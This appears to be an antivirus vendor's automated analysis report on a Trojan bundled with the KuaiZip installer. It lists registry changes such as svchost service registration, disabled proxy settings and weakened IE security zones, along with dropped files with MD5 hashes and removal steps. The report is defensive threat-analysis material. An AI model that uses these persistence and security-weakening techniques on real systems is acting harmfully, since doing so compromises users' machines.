[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.066]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.074]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.087]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.023]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.039\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mou\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gz]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.046\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.016]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.023\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.028]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.028\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.080]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.014]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.05\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.055\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.024]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.018\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.072]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.010\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.052\UserChoice]
"Progid"
The process %original file name%.exe:756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 97 38 C1 E3 EE 52 B2 C1 C2 DA FF 7B D4 41 0D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process net.exe:1864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 7F 6C EA 58 8F 2F FB 76 72 7B E6 4E 38 F1 3B"
The process regsvr32.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 EB 42 34 75 46 46 19 1E 27 0C 0A 78 DF 08 97"
[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "快压软件å‡级检查æœÂÂ务"
[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"
The process regsvr32.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 07 07 3A 21 DC A7 0B 46 B7 92 BC 32 FB 47 3E"
The process regsvr32.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}]
"(Default)" = "KzShlobj Class"
[HKCR\KuaiZip.zip\shellex\DropHandler]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"
[HKCR\QZipShell.PropertyExt\CLSID]
"(Default)" = "{2FB831EA-DA68-4A66-8E31-A2D976A6296C}"
[HKCR\QZipShell.DragDropMenu\CLSID]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\QZipShell.KYDropHandler]
"(Default)" = "KYDropHandler Class"
[HKCR\QZipShell.ContextMenuExt.1]
"(Default)" = "ContextMenuExt Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"KuaiZip Shell Extension" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\ProgID]
"(Default)" = "QZipShell.KzShlobj.1"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\VersionIndependentProgID]
"(Default)" = "QZipShell.KYDropHandler"
[HKCR\QZipShell.ContextMenuExt]
"(Default)" = "ContextMenuExt Class"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}]
"(Default)" = "IKzShlobj"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\ProgID]
"(Default)" = "QZipShell.ContextMenuExt.1"
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\QZipShell.KYDropHandler.1\CLSID]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"
[HKCR\QZipShell.DragDropMenu.1\CLSID]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\ProgID]
"(Default)" = "QZipShell.PropertyExt.1"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\ProgID]
"(Default)" = "QZipShell.DragDropMenu.1"
[HKCR\QZipShell.KYDropHandler\CurVer]
"(Default)" = "QZipShell.KYDropHandler.1"
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\VersionIndependentProgID]
"(Default)" = "QZipShell.KzShlobj"
[HKCR\Directory\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\*\shellex\ContextMenuHandlers\ContextMenuExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Folder\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\Drive\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}]
"(Default)" = "DragDropMenu Class"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\QZipShell.DragDropMenu.1]
"(Default)" = "DragDropMenu Class"
[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0]
"(Default)" = "QZipShell 1.0 Type Library"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\ProgID]
"(Default)" = "QZipShell.KYDropHandler.1"
[HKCR\QZipShell.KzShlobj\CLSID]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}]
"(Default)" = "ContextMenuExt Class"
[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\QZipShell.DragDropMenu\CurVer]
"(Default)" = "QZipShell.DragDropMenu.1"
[HKCR\KuaiZip.kz\shellex\DropHandler]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"
[HKCR\QZipShell.DragDropMenu]
"(Default)" = "DragDropMenu Class"
[HKCR\AppID\{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}]
"(Default)" = "QZipShell"
[HKCR\QZipShell.ContextMenuExt.1\CLSID]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\HELPDIR]
"(Default)" = "%Program Files%\¿ìѹ\X86"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\KzShlobj]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\QZipShell.PropertyExt.1\CLSID]
"(Default)" = "{2FB831EA-DA68-4A66-8E31-A2D976A6296C}"
[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\0\win32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\QZipShell.ContextMenuExt\CLSID]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\QZipShell.ContextMenuExt\CurVer]
"(Default)" = "QZipShell.ContextMenuExt.1"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\QZipShell.KYDropHandler\CLSID]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}]
"(Default)" = "KYDropHandler Class"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 6E AC 54 6F 36 AE D4 E7 53 A0 8E 17 48 C7 E8"
[HKCR\QZipShell.KzShlobj.1]
"(Default)" = "KzShlobj Class"
[HKCR\QZipShell.KYDropHandler.1]
"(Default)" = "KYDropHandler Class"
[HKCR\Directory\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\VersionIndependentProgID]
"(Default)" = "QZipShell.ContextMenuExt"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\VersionIndependentProgID]
"(Default)" = "QZipShell.DragDropMenu"
[HKCR\Drive\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\QZipShell.KzShlobj.1\CLSID]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\QZipShell.KzShlobj\CurVer]
"(Default)" = "QZipShell.KzShlobj.1"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\VersionIndependentProgID]
"(Default)" = "QZipShell.PropertyExt"
[HKCR\QZipShell.KzShlobj]
"(Default)" = "KzShlobj Class"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\QZipShell.PropertyExt.1]
"(Default)" = "PropertyExt Class"
[HKCR\QZipShell.PropertyExt\CurVer]
"(Default)" = "QZipShell.PropertyExt.1"
[HKCR\QZipShell.PropertyExt]
"(Default)" = "PropertyExt Class"
[HKCR\*\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\AppID\QZipShell.DLL]
"AppID" = "{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}]
"(Default)" = "PropertyExt Class"
The process regsvr32.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 14 80 CD C9 2C 64 09 63 51 5B 6C 8E 64 51 22"
[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "快压软件å‡级检查æœÂÂ务"
[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"
The process 2345pic_k1252705.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB B7 7A 31 C2 C9 85 4E 6A 3C 6C 2F E7 7B 5F EC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process LockPage.exe:1212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\ComputerName]
"Path" = "%Program Files%\Common Files\System\safe.dat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"DomainVer" = "1.0.0.2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"IdVer" = "1.0.0.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"MD5Ver" = "1.0.1.12"
[HKCR\CLSID\{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D8}\InProcServer32]
"(Default)" = "..\Program Files\Common Files\System\antivirus.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"Lock" = "1"
[HKCR\CLSID\{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D7}\InProcServer32]
"(Default)" = "..\Program Files\Common Files\System\safemonn32.dll"
[HKCU\Software\Classes]
"SetupTime" = "2016-04-11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0OverlayIcon]
"(Default)" = "{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D7}"
[HKCU\Software\Classes]
"Update" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 42 F8 53 BE A7 20 84 84 DF 12 85 37 6F 91 B6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\offlinne files]
"(Default)" = "{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D8}"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"GlobalVer" = "1.0.1.12"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:]
"unit.bat" = "unit"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SetupTime" = "2016-04-11"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process at.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 58 FA C4 9A 6F B7 3B F3 AC EF 30 EA E9 8B 3A"
The process at.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 17 4E 1C DD 56 1E BC FE E0 84 9E EA 52 7E 36"
Dropped PE files
MD5 | File path |
---|---|
8cbebe8bf2dc8f62d8e0f1bdc61fe6e4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\FileInfo.dll |
6508d7353ceb0a5e1ce3f6d547f9d8e6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\RCWidgetPlugin.dll |
b22e97f113fa16668c8443e3115c6fc6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\System.dll |
18c05429ac641190c246473ddf1bbd98 | c:\Program Files\¿ìѹ\X86\7z.dll |
3a2c737509d27c1d68313dd371dc7aa7 | c:\Program Files\¿ìѹ\X86\DiskOpt.exe |
d03441593e39f82cd4532caecd4e3aa8 | c:\Program Files\¿ìѹ\X86\DuiLib.dll |
90fbba2edef9215952664833f8e60160 | c:\Program Files\¿ìѹ\X86\KZFormat.dll |
6fc083cc0ca7c9a809ea54ad75d34643 | c:\Program Files\¿ìѹ\X86\KZModule.dll |
925b6df2e1ebb147af8a348a43cacf0b | c:\Program Files\¿ìѹ\X86\KZMount2.exe |
d0984f95f7552d8cb19b61a8899471cb | c:\Program Files\¿ìѹ\X86\KZReport.exe |
286683cf098ffddd4d5dd681eca789ec | c:\Program Files\¿ìѹ\X86\KZTui.exe |
ad0d12355799b3ba1396fce3aaaa073c | c:\Program Files\¿ìѹ\X86\KZipShell.dll |
3aed1d9d2b71dd0ef5e9b312ea68d187 | c:\Program Files\¿ìѹ\X86\KuaiZip.exe |
fbb06f389086afd3b8c6bb52ad500464 | c:\Program Files\¿ìѹ\X86\KuaiZipDrive.sys |
21a7617bd3978b25776956b68a07b0e4 | c:\Program Files\¿ìѹ\X86\Mount.dll |
db5da45cd4c1355796ea95fc05acbf74 | c:\Program Files\¿ìѹ\X86\MountCore.dll |
4354872f987aec55d65402c74d706829 | c:\Program Files\¿ìѹ\X86\SetupHelper.exe |
36cf7a80f981890605d6160caf18b625 | c:\Program Files\¿ìѹ\X86\Uninst.exe |
bd027eccff948b726f7b510deed05194 | c:\Program Files\¿ìѹ\X86\Update.exe |
90fefe0f5ca65c6dc6e7fc159427bb93 | c:\Program Files\¿ìѹ\X86\UpdateChecker.exe |
1f0bce792b0bf938c845cf2d6fc426e9 | c:\Program Files\¿ìѹ\X86\finderlib.dll |
575b3ea8ac2d1cca03c4a13cb82aa7a5 | c:\Program Files\¿ìѹ\X86\kuaizipUpdateChecker.dll |
5436222ab1bd8b283a2b739dbf490258 | c:\Program Files\¿ìѹ\X86\lang\Chs_Lang.dll |
1c915f9fbfe082f23aac2d9b56f34047 | c:\Program Files\¿ìѹ\X86\reportframework.dll |
3c86bc87a9e65d5fbc05410816a78d80 | c:\Program Files\¿ìѹ\X86\sfx\kzSetup_chs.sfx |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
taskkill.exe:1876
taskkill.exe:1492
taskkill.exe:1840
taskkill.exe:580
KuaiZip_Setup_union123_0088.exe:552
KZReport.exe:892
net1.exe:1484
ping.exe:468
KuaiZip.exe:856
net.exe:1864
regsvr32.exe:604
regsvr32.exe:1676
regsvr32.exe:628
regsvr32.exe:1460
LockPage.exe:1212
at.exe:1788
at.exe:496 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\¿ìѹ\data\slimdata.dat (784 bytes)
%Program Files%\¿ìѹ\ErrorMsg.xml (196 bytes)
%Program Files%\¿ìѹ\readme.txt (1 bytes)
%Program Files%\¿ìѹ\X86\KZReport.exe (7523 bytes)
%Program Files%\¿ìѹ\X86\Uninst.exe (8994 bytes)
%Program Files%\¿ìѹ\7zNew.dat (32 bytes)
%Program Files%\¿ìѹ\X86\SetupHelper.exe (863 bytes)
%Program Files%\¿ìѹ\X86\KZMount2.exe (3478 bytes)
%Program Files%\¿ìѹ\X86\reportframework.dll (7405 bytes)
%Program Files%\¿ìѹ\X86\sfx\kzSetup_chs.sfx (5506 bytes)
%Program Files%\¿ìѹ\SLDefault.xml (196 bytes)
%Program Files%\¿ìѹ\X86\KZModule.dll (6778 bytes)
%Program Files%\¿ìѹ\X86\KZipShell.dll (3047 bytes)
%Program Files%\¿ìѹ\ali\kzshop.ico (1686 bytes)
%Program Files%\¿ìѹ\X86\7z.dll (7131 bytes)
%Documents and Settings%\%current user%\Desktop\¿ìѹ.lnk (661 bytes)
%Program Files%\¿ìѹ\X86\KZFormat.dll (2224 bytes)
%Program Files%\¿ìѹ\skin\disopt.skn (3635 bytes)
%System%\wbem\Logs\wbemprox.log (76 bytes)
%Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll (393 bytes)
%Program Files%\¿ìѹ\X86\Mount.dll (1686 bytes)
%Program Files%\¿ìѹ\X86\finderlib.dll (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KZ7ZData.7z.MD5 (33 bytes)
%Program Files%\¿ìѹ\X86\KuaiZip.exe (12581 bytes)
%Program Files%\¿ìѹ\KzNew.dat (74 bytes)
%Program Files%\¿ìѹ\ZipNew.dat (22 bytes)
%Program Files%\¿ìѹ\X86\MountCore.dll (1059 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (38588 bytes)
%Program Files%\¿ìѹ\__-________.URL (49 bytes)
%Documents and Settings%\%current user%\Application Data\Kuaizip\report_config.txt (131 bytes)
%Program Files%\¿ìѹ\X86\DiskOpt.exe (4801 bytes)
%Documents and Settings%\%current user%\Start Menu\¿ìѹ.lnk (661 bytes)
%Program Files%\¿ìѹ\X86\UpdateChecker.exe (4527 bytes)
%Program Files%\¿ìѹ\X86\KuaiZipDrive.sys (1137 bytes)
%Program Files%\¿ìѹ\X86\KZTui.exe (4527 bytes)
%Program Files%\¿ìѹ\X86\Update.exe (7758 bytes)
%Program Files%\¿ìѹ\X86\DuiLib.dll (4801 bytes)
%Program Files%\¿ìѹ\ali\jp.png (392 bytes)
%Program Files%\¿ìѹ\X86\lang\Chs_Lang.dll (1020 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\js1[1] (623688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\bjzy3[1] (147925 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\js2[1] (664204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\js3[1] (672184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l5qvobehj20c80gbnpk[1].jpg (367545 bytes)
